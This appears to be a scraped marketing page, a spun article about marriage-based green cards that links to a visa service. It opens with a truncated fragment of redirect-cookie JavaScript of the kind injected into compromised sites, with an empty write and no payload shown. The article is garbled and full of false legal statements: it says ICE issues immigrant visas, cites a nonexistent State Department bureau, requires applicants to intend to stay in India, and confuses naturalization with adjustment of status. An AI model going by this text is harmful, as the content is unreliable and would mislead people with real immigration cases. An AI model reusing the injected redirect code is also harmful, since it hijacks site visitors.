=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} " /> Marriage to Immigrants – Can an Immigration Attorney Help?

Marriage to Immigrants – Can an Immigration Attorney Help?

Marriage to Immigrants - Can an Immigration Attorney https://www.visa2us.com/marriage-green-card Help?

A green card marriage visa is a marriage between a US citizen and an alien who would ordinarily be ineligible for citizenship due to being unmarried. This status is given by the US federal government for certain categories of people. Some of these are immigrants, minors with special skills or relatives with permanent residence in the United States. Green card approval for spouses of US citizens is also given to legal permanent residents of United States. Green card processing times take longer since the process is based on threat.

An immigrant with union green card cannot be granted an immigrant visa until he or she is approved for advance parole. The immigrant can apply for an immigrant visa for the spouse or children coming into the United States together. The US Immigration and Customs Enforcement (ICE) grants immigrant visas to spouses who can provide evidence of marriage to their American partner. Proof of marriage can be provided either via a marriage certificate or a signed marriage certificate from the principal applicant. Sometimes this proof isn't accessible from the principal applicant. When the marriage certificate isn't available, the applicant must provide documentary evidence such as a notarized copy of the marriage certificate or a birth certificate for the main applicant.

An immigrant with union green card who wants to bring his or her family along may also apply for an immigrant L-1 visa or an immigrant L visa by applying to the Department of State's Bureau of Immigration and Customs. There are different programs available for partners of United States citizens or immigrants who are eligible for naturalization as either an immigrant or non-immigrant. An immigrant with a green card may have to get an immigrant visa to be able to sponsor an immediate relative, including himself or herself. Sponsoring a direct relative requires a signed I visa application.

Permanent resident status (green card) is accomplished through the conclusion of a legal permanent resident program. To achieve this status, an immigrant must initially enter the United States legally by coming through an airport or landing on an air or sea vessel. After arriving in the USA, the immigrant must qualify for admission as an immigrant, dependent upon his or her entry status and whether he or she is married or not. After attaining the lawful permanent resident status, the immigrant may apply for adjustment of status, known as adjustment of status.

The legal immigrant may also submit an application for adjustment of status if he or she becomes bankrupt, has a severe medical condition or has separated or divorced his or her spouse. He or she must not have been granted deportation relief while the application was pending. An immigrant cannot change his or her status if he or she has entered the country illegally by having purchased or otherwise obtained real property without making sure that the property was legally purchased. Immigrants can't change their status if they have become a public charge such as a dependent or criminal. He or she can't change status when the period of legally practicing the profession ends unless he or Marriage Green Card Services she first requests that change.

There are two methods used to adjust status. The applicant can go through the naturalization process, also called the visa process, or they can file for an immigrant visa, also called the green card process. Immigration benefits are awarded to lawful permanent residents and their spouses who fulfill the requirements for attaining green card status. Two of the requirements are that the applicants must have reached age eighteen years; they need to be physically capable of performing the duties required of an immigrant, and they must have an intention to return to India or remain in India permanently.

Annually, a certain number of qualified applicants will be selected to look at the interview component of the naturalization process. Applicants may apply for green card by filling out the program at any US consulate or embassy abroad, or they may apply online at the closest U.S. consulate. During the interview component of the process, applicants should provide documentary evidence that they meet all the eligibility requirements. When interviewed, a consular officer will analyze the documents provided and determine whether the candidates qualify to apply for a green card.

If the applicants do qualify, they'll be provided an application that they need to file with the US Department of State. It is very important to not forget that once a green card application is filed in the wrong way, it may not be processed . Because of this, an immigrant visa may not be issued, or the marriage between the foreign spouse and US citizen won't be legalized. Because of this, it is very important for anybody who wishes to adjust status to consult an immigration lawyer, who will represent them before the USCIS, or law judges.